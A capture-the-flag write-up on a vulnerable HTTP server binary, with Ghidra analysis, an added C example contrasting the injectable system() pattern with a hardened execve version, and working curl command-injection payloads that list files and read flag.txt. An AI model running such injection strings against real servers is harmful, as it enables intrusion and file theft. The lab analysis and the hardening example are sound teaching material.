Our webserver has a few flaws in it :(
The given file is a binary which appears to be an implementation of an HTTP server:
a.out: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=a0e015bbe044f88bfcc6544ce015aca480b86641, for GNU/Linux 3.2.0, not stripped
Following the challenge instruction, I opened the binary in Ghidra to take a look at the decompiled code ;-)
The exploitable part is on line 81 of the decompiled code. The echo mentioned in the instruction turns out to be a system command call built from request-controlled input, so we can put anything in its place. Also, on lines 74-78 we can see that < characters are substituted with
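The pattern described above, as an added example that is not the challenge binary's code: a request-controlled string interpolated into a shell command behind a filter that only handles '<' (the page does not show what the binary replaces it with; here it is simply dropped), next to a hardened version that allowlists the argument and runs /bin/echo through execve with a fixed argv, so no shell ever sees the input. The function names, the filter behaviour and the allowlist are assumptions.

```c
/*
 * Constructed example, not code from the challenge binary: the vulnerable
 * "filter one character, then system()" pattern next to a version that
 * never hands the request to a shell at all.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Assumed filter: '<' is dropped. The writeup says the binary substitutes
 * '<' with something but does not show with what. */
static void filter_lt(const char *in, char *out, size_t n) {
    size_t j = 0;
    for (size_t i = 0; in[i] != '\0' && j + 1 < n; i++)
        if (in[i] != '<')
            out[j++] = in[i];
    out[j] = '\0';
}

/* Vulnerable: builds the string a system() call would receive.
 * Returns the length of the resulting command. */
int vulnerable_build_cmd(const char *query, char *cmd, size_t n) {
    char clean[512];
    filter_lt(query, clean, sizeof clean);
    return snprintf(cmd, n, "echo %s", clean);
}

/* Characters that let a shell start another command or a substitution.
 * Any of these surviving the filter means filtering '<' bought nothing. */
int has_shell_metachars(const char *s) {
    return strpbrk(s, "`$;|&'\"()\n") != NULL;
}

/* Hardened: allowlist the argument (and refuse a leading '-' so it cannot
 * become an option to echo), then execve /bin/echo with a fixed argv.
 * Returns the number of output bytes captured, or -1 on rejected input
 * or failure. */
int safe_echo(const char *arg, char *out, size_t n) {
    static const char allowed[] =
        "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 ._/-";
    if (arg[0] == '\0' || arg[0] == '-' || strspn(arg, allowed) != strlen(arg))
        return -1;

    int fd[2];
    if (pipe(fd) != 0)
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        dup2(fd[1], STDOUT_FILENO);
        close(fd[0]);
        close(fd[1]);
        char *const argv[] = {"/bin/echo", (char *)arg, NULL};
        char *const envp[] = {NULL};
        execve(argv[0], argv, envp);   /* no shell: quotes and backticks are inert */
        _exit(127);
    }
    close(fd[1]);
    size_t total = 0;
    ssize_t r;
    while (total + 1 < n && (r = read(fd[0], out + total, n - 1 - total)) > 0)
        total += (size_t)r;
    close(fd[0]);
    out[total] = '\0';
    int status = 0;
    waitpid(pid, &status, 0);
    if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
        return -1;
    return (int)total;
}

int main(void) {
    /* The writeup's payload as the server would see it after the shell
       running curl has turned \` into a literal backtick. */
    const char *payload = "/usr/bin/bash -c 'echo `ls`'";
    char cmd[600], out[256];
    vulnerable_build_cmd(payload, cmd, sizeof cmd);
    printf("vulnerable version would run: %s\n", cmd);
    printf("shell metacharacters survive the filter: %d\n", has_shell_metachars(cmd));
    printf("safe_echo(payload) -> %d (rejected)\n", safe_echo(payload, out, sizeof out));
    int n = safe_echo("flag.txt", out, sizeof out);
    printf("safe_echo(\"flag.txt\") -> %d bytes: %s", n, out);
    return 0;
}
```

The point of the hardened variant is not the allowlist alone but that the argument reaches /bin/echo as one argv element; even if a metacharacter slipped through the allowlist, there is no shell to interpret it.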
To exploit the finding I used curl as below.
curl --path-as-is "http://184.108.40.206:8080/?/usr/bin/bash -c 'echo \`ls \`'"
The response is the directory listing:
a.out echo flag.txt ynetd
The flag can then be read the same way:
curl --path-as-is "http://220.127.116.11:8080/?/usr/bin/bash -c 'echo \`cat -A flag.txt\`'"